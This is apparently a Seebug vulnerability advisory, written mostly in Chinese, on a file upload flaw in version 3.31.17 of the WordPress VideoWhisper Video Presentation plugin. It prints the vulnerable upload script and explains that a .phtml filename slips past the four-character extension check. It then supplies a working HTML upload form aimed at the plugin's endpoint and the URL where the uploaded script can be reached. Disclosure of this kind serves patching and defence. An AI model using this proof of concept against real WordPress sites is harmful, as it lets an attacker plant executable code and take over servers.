WordPress VideoWhisper Video Presentation Plugin 3.31.17 /vp/vw_upload.php 文件上传漏洞

2015-04-20T00:00:00
ID SSV:89141
Type seebug
Reporter Root
Modified 2015-04-20T00:00:00

Description

<ul><li>/vp/vw_upload.php</li></ul><pre class=""><?php

if ($_GET["room"]) $room=$_GET["room"];

if ($_POST["room"]) $room=$_POST["room"];

$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");

sanV($room);

if (!$room) exit;

sanV($filename);

if (strstr($filename,".php")) $filename = ""; //duplicate php extension not allowed due to vulnerabilities of older web servers

if (!$filename) exit;

$destination="uploads/".$room."/";

if ($_GET["slides"]) $destination .= "slides/";

$ext=strtolower(substr($filename,-4));

$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);

?>loadstatus=1 </pre><p>当用户上传phtml文件的时候,$ext为html,绕过检测。</p><p>使用payload上传文件:</p><pre class=""><form action="http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php" method="post" enctype="multipart/form-data">

<input type="file" name="vw_file">

<input type="text" name="room" value=".">

<button type="submit">Submit</button>

</form></pre><p><img alt="4626BA47-DBE7-490D-A1FA-38CA9A964340.png" src="https://images.seebug.org/@/uploads/1434332146034-4626BA47-DBE7-490D-A1FA-38CA9A964340.png" data-image-size="680,137"><br></p><p>上传文件并组合文件URL:</p><pre class="">http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/uploads/test.phtml </pre><p><img alt="1E1212DC-CA66-4A9C-9FCF-A1385A92EE00.png" src="https://images.seebug.org/@/uploads/1434332154409-1E1212DC-CA66-4A9C-9FCF-A1385A92EE00.png" data-image-size="674,267"><br></p>